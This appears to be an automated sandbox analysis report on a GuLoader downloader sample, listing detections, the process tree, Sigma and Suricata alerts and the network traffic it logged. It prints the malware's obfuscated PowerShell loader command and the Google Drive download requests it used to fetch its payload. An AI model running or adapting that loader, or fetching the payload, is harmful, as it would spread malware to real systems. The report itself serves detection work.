Windows Analysis Report
Cpfkf79Rzk.exe

Overview

General Information

Sample name: Cpfkf79Rzk.exe
renamed because original name is a hash value
Original sample name: f973b482345d4ff8ac164868b9f50ce95e47ed2648b57c400ab59f04457c9a4f.exe
Analysis ID: 1588341
MD5: c642619ad2a1ac39867c56cb2f889e78
SHA1: a15c485e5dbacdb5776e2cec6c3a1af3c4a400d2
SHA256: f973b482345d4ff8ac164868b9f50ce95e47ed2648b57c400ab59f04457c9a4f
Tags: exe, user-adrian__luca

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Cpfkf79Rzk.exe (PID: 3736 cmdline: "C:\Users\user\Desktop\Cpfkf79Rzk.exe" MD5: C642619AD2A1AC39867C56CB2F889E78)
    • powershell.exe (PID: 1428 cmdline: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Kvababbelser58.exe (PID: 5912 cmdline: "C:\Users\user~1\AppData\Local\Temp\Kvababbelser58.exe" MD5: C642619AD2A1AC39867C56CB2F889E78)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.2638156664.00000000016FA000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000002.00000002.2070497812.0000000008D1A000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      System Summary

      Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cpfkf79Rzk.exe", ParentImage: C:\Users\user\Desktop\Cpfkf79Rzk.exe, ParentProcessId: 3736, ParentProcessName: Cpfkf79Rzk.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , ProcessId: 1428, ProcessName: powershell.exe
      Source: Process started, Author: frack113, Nasreddine Bencherchali: Data: Command: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cpfkf79Rzk.exe", ParentImage: C:\Users\user\Desktop\Cpfkf79Rzk.exe, ParentProcessId: 3736, ParentProcessName: Cpfkf79Rzk.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , ProcessId: 1428, ProcessName: powershell.exe
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cpfkf79Rzk.exe", ParentImage: C:\Users\user\Desktop\Cpfkf79Rzk.exe, ParentProcessId: 3736, ParentProcessName: Cpfkf79Rzk.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylus=$Quadruplicates.SubString(8202,3);.$syndactylus($Quadruplicates)" , ProcessId: 1428, ProcessName: powershell.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2025-01-11T00:50:00.500769+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49969 | 216.58.206.46 | 443 | TCP

      AV Detection

      Source: C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe, ReversingLabs: Detection: 55%
      Source: Cpfkf79Rzk.exe, ReversingLabs: Detection: 55%
      Source: Cpfkf79Rzk.exe, Virustotal: Detection: 70%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
      Source: Cpfkf79Rzk.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49970 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49977 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49979 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49981 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49987 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49991 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49993 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49995 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49997 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49999 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50003 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50005 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:50009 version: TLS 1.2
      Source: Cpfkf79Rzk.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: on.pdb source: powershell.exe, 00000002.00000002.2059540466.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2064199965.0000000007121000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe, Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe, Code function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe, Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49969 -> 216.58.206.46:443
      Source: global traffic, HTTP traffic detected:
        GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: drive.google.com
        Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected:
        GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected:
        GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: drive.google.com
        Cache-Control: no-cache
        Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global traffic, HTTP traffic detected:
        GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
        Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRLVVHvRjh54fH2-gt35XPbgdTelw0Mc8ZLRCV9Ssh1c3kr2Wv6Xn0SUyZQjkuZ4zwwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:01 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-nsG67Q5cynzGTl6ANojSkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE; expires=Sat, 12-Jul-2025 23:50:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR3OmXTgs2fyZL9Lrw4lucHPc-7cCcpEJ9vaLjGWbn_LikgV1KaM0y3MIMG224fWC_5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:04 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Sl9nh-YO6cDK7CcQgST5tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQJmEdCyP-Hmuwz9hJ9gDloHXupxA_CDRV6E_koZTRez1bxH5ANe-61AXhf0JTtbxD-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-gKiuzzxo1j_3g4MQHGKj_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQY1gtx9tUvyQr-YalIe5dy154ewzwGJRyLWpNNpak5OgELrjLos4bD0-xxBxFHbGyTrFflm4wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-yYX3teXftvJUH-6jD18A1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTBdrd6V48dOp4BS-iqdzaYtjYBLAIc5PwImhk5xogB7XM9Gc_n8nk-JUazgEx4x2ZFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:10 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-lTC9gWrixil5kxVqTBJDWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQpt0l3MUuSkNT7nfm_Au9Z6434htwNXXNx0ZvmGP3odNFiLqxaSK351AuuZliWXe7HOJYwCwsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-lJ5eyAKr-mNs6yS5YfMxvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: Cpfkf79Rzk.exe, 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Cpfkf79Rzk.exe, 00000000.00000000.1394783976.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Kvababbelser58.exe, 00000007.00000000.2058334532.000000000040A000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2069318942.00000000081EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
      Source: powershell.exe, 00000002.00000002.2069318942.0000000008212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
